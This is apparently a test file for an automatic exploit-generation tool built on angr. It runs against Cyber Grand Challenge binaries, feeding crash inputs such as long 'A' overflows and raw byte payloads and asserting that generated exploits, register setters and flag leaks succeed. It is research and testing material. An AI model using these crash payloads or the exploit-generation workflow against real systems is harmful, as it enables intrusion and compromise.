def test_KPRCA_00057():
"""
This test requires pointing an arbitrary transmit using atoi at the flag
"""
with open(os.path.join(tests_dir, "KPRCA_00057_crash")) as f:
crash = f.read()
# set up hooks
format_infos = []
format_infos.append(FormatInfoStrToInt(0x8049e90, "based_atoi_8", str_arg_num=0, base=8,
base_arg=None, allows_negative=False))
format_infos.append(FormatInfoStrToInt(0x804b3b0, "strtol", str_arg_num=0, base=None,
base_arg=2, allows_negative=False))
format_infos.append(FormatInfoStrToInt(0x804b160, "strtol", str_arg_num=0, base=None,
base_arg=2, allows_negative=False))
format_infos.append(FormatInfoDontConstrain(0x8049e90, "fdprintf", 1))
binary = os.path.join(bin_location, "tests/cgc/KPRCA_00057")
crash = rex.Crash(binary, crash, format_infos=format_infos)
nose.tools.assert_true(crash.one_of(Vulnerability.ARBITRARY_TRANSMIT))
flag_leaks = list(crash.point_to_flag())
nose.tools.assert_true(len(flag_leaks) >= 1)
cg = colorguard.ColorGuard(binary, flag_leaks[0])
cg.causes_leak()
pov = cg.attempt_pov()
nose.tools.assert_true(_do_pov_test(pov))
def symbol_to_format_info(addr, symbol):
# picks the correct format info from a symbol
if symbol.startswith("atoi"):
allows_negative = "_no_signs" not in symbol
return FormatInfoStrToInt(addr,
symbol,
str_arg_num=0,
base=10,
base_arg=None,
allows_negative=allows_negative)
if symbol.startswith("based_atoi"):
allows_negative = "signed" in symbol
return FormatInfoStrToInt(addr,
symbol,
str_arg_num=0,
base=int(symbol.split("_")[-1]),
base_arg=None,
allows_negative=allows_negative)
if symbol == "int2str" or symbol == "uint2str":
return FormatInfoIntToStr(addr,
symbol,
int_arg_num=2,
str_dst_num=0,
base=10,
base_arg=None)
if symbol == "int2str_v2" or symbol == "uint2str_v2":
return FormatInfoIntToStr(addr,
symbol,
int_arg_num=0,
str_dst_num=1,
base=10,
base_arg=None)
if symbol == "int2str_v3" or symbol == "uint2str_v3":
return FormatInfoIntToStr(addr,
symbol,
int_arg_num=1,
str_dst_num=0,
base=10,
base_arg=None)
if symbol.startswith("strtol"):
return FormatInfoStrToInt(addr,
symbol,
str_arg_num=0,
base=None,
base_arg=2,
allows_negative=True)
if symbol == "printf":
return FormatInfoDontConstrain(addr, symbol, check_symbolic_arg=0)
if symbol == "fdprintf":
return FormatInfoDontConstrain(addr, symbol, check_symbolic_arg=1)
return None
def test_chall_resp_atoi():
crash_input = '-435982256\n-439864843\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' \
'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' \
'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' \
'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' \
'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n'
bin_path = bin_location + "/tests/i386/chall_resp_atoi"
cfg_fast = angr.Project(bin_path).analyses.CFGFast()
atoi_addr = cfg_fast.functions["atoi"].addr
itoa_addr = cfg_fast.functions["itoa"].addr
f1 = FormatInfoIntToStr(addr=itoa_addr,
func_name="itoa",
int_arg_num=1,
str_dst_num=0,
base=10,
base_arg=None)
f2 = FormatInfoStrToInt(addr=atoi_addr,
func_name="atoi",
str_arg_num=0,
base=10,
base_arg=None,
allows_negative=True)
crash = rex.Crash(bin_path, crash=crash_input, format_infos=[f1, f2])
exploit_f = crash.exploit()
for e in exploit_f.register_setters:
nose.tools.assert_true(_do_pov_test(e))
for e in exploit_f.leakers:
nose.tools.assert_true(_do_pov_test(e))
def test_cromu71():
crash_input = 'feq\n &\x06\x00\x80\xee\xeen\nf\x00f_E_p\x00\x00\x80\x00q\n3&\x1b\x17/\x12\x1b\x1e]]]]]]]]]]]]]]]]]]]]\n\x1e\x7f\xffC^\n'
binary = os.path.join(bin_location, "tests/cgc/CROMU_00071")
# create format info for atoi
format_infos = []
format_infos.append(FormatInfoStrToInt(0x804C500, "based_atoi_signed_10", str_arg_num=0, base=10,
base_arg=None, allows_negative=True))
crash = rex.Crash(binary, crash_input)
# let's generate some exploits for it
arsenal = crash.exploit()
# make sure it works
nose.tools.assert_true(_do_pov_test(arsenal.best_type1))